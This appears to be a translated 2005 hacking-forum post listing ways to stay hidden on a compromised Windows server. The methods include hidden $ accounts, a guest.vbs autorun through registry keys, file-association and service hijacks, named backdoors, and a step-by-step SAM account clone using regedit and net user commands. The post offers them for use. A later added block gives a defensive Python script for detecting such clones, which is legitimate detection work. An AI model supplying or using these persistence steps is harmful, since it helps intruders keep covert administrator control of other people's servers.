
Ways to hide yourself after getting into a server

2005-10-18
Anonymous
www.myhack58.com

I like staying hidden, so I have summed up some hiding schemes; which one to use depends on the situation.
These are the usual ways of hiding yourself after getting into a server:
1. Clone an account with superdoor, but it has a bug. Brother Banyan's ca clone relies on IPC, which is not very nice.
2. Create a hidden account such as count$. net user does not list it, but it can be seen in user management, the user profiles under My Computer properties show an unknown account, and a count$ folder appears under Documents and Settings. This is not particularly good: on the 3 or so machines where I did this, the result was that it got killed every time.
3. Write a guest.vbs that, when it starts, creates an account or activates the guest user or the tsinternetuser user, and import a key value (prepared in advance) under winlogon in the registry so that guest.vbs runs at boot, thus creating a ghost account.
Or import:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun"="C:\\Program Files\\guest.vbs"
This ties it to cmd: the account is created whenever cmd is run.
4. Like Glacier, associate with txt or exe files, so that opening a txt runs our program.
5. Configure autorun in Group Policy.
6. Set a file association so that running Notepad or the like activates the vbs.
7. Plant a backdoor such as hackdefender, hack'sdoor, winshell or Wuhan Boys. These are easily killed, though, and without modification they are almost useless. If one does not get killed, that's that. Hehe!!!
8. File bundling: replace a frequently used file with a RAR self-extracting file that contains both the original exe and your program (that is, a WinRAR bundle, which does not get killed). When it runs it repeats step 3, 4 or 5, whichever you like.
9. While searching around I found hideadmin, which is really not bad. It requires administrator permissions and hides users whose names end in $. Awesome! There is no trace of the account at the command line, in the management interface or in the user profiles. In a word, strong! So strong that for ages I did not know how to remove it and just let it stay! Down to the next leader also has a tool with the same purpose.
10. Replace a service: swap telnet or termsvc in for another service, or create a new one.
11. Clone a hidden account by hand in the registry. This method circulates online and seems very cool, but when I tested it on a 2000 server the domains or account key did not exist, perhaps because the machine was not in a domain, so I could not find it.
Still, here it is in a bit more detail:
In Windows 2000 and Windows NT, the SID of the default administrator account is fixed at 500 (0x1f4), so we can take an account that already exists on the machine and make it a clone of the account whose SID is 500. Here the account we select is IUSR_MachineName (to improve concealment).
In cmd:
regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
This exports the information for the administrator account whose SID is 500. Then edit the admin.reg file. On the third line of admin.reg,
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
change the final '1F4' to the SID of IUSR_MachineName (on most machines this user's SID is 0x3E9; if IIS was not installed when the machine was first set up, and you created accounts yourself before installing IIS, it is probably not this value). After '1F4' in the Root.reg file has been changed to '3E9', run the following for the other account, the one whose values you need to modify:
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
Copy the section of iusr.reg that runs from "V"=hex:0 to the end of the file,
then use it to replace the part at the same position in adam.reg.
Finally, use regedit /s adam.reg to import the reg file.
Then run net user IUSR_MachineName password to change the IUSR_MachineName password.
Hehe, OK, you're done!
Now the IUSR_MachineName account has administrator permissions, but net.exe and the user management in the administrative tools show no trace of this; even if you look at the groups the user belongs to, nothing differs from before the modification.
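A defender's check for the clone described above, as an added example that is not part of the original article: it parses a regedit export of the SAM Users keys and flags any key whose name (the account's RID, which the article calls the SID) disagrees with the RID stored inside its "F" value. The 0x30 offset of that field is an assumption not taken from the article, and the sample export is constructed and shortened.

```python
import re

SAM_USERS = r"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
RID_OFFSET = 0x30  # assumption, not from the article: RID is a little-endian DWORD here in "F"

def parse_reg(text):
    """Return {key_path: {value_name: raw_data}} from regedit export text."""
    text = re.sub(r"\\\r?\n\s*", "", text)  # join hex data wrapped with a trailing backslash
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
        elif current is not None and (m := re.match(r'"([^"]+)"=(.*)', line)):
            current[m.group(1)] = m.group(2)
    return keys

def find_rid_mismatches(text):
    """Return (key_rid, f_rid) for each Users key whose "F" data names another RID."""
    findings = []
    for path, values in parse_reg(text).items():
        m = re.fullmatch(re.escape(SAM_USERS) + r"\\([0-9A-Fa-f]{8})", path)
        data = values.get("F", "")
        if not m or not data.startswith("hex:"):
            continue
        raw = bytes.fromhex(data[4:].replace(",", ""))
        if len(raw) < RID_OFFSET + 4:
            continue  # too short to hold the RID field
        key_rid = int(m.group(1), 16)
        f_rid = int.from_bytes(raw[RID_OFFSET:RID_OFFSET + 4], "little")
        if key_rid != f_rid:
            findings.append((key_rid, f_rid))
    return findings

def _f(rid):
    """Constructed, shortened "F" blob: zero padding, the RID field, 4 trailing bytes."""
    blob = bytes(RID_OFFSET) + rid.to_bytes(4, "little") + bytes(4)
    return "hex:" + ",".join(f"{b:02x}" for b in blob)

# Constructed sample export, not real SAM data: key 000003E9 carries an "F" copied from RID 500.
SAMPLE = "\n".join([
    "REGEDIT4", "",
    rf"[{SAM_USERS}\000001F4]", f'"F"={_f(500)}', "",
    rf"[{SAM_USERS}\000003E9]", f'"F"={_f(500)}', "",
    rf"[{SAM_USERS}\000003EA]", f'"F"={_f(1002)}', "",
])

if __name__ == "__main__":
    for key_rid, f_rid in find_rid_mismatches(SAMPLE):
        print(f"Users\\{key_rid:08X}: F value carries RID {f_rid}, possible cloned account")
```

Exports written by current versions of regedit are UTF-16, so decode the file before passing its text to `find_rid_mismatches`.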
That is about all I know. If anyone has a better way, feel free to enlighten me...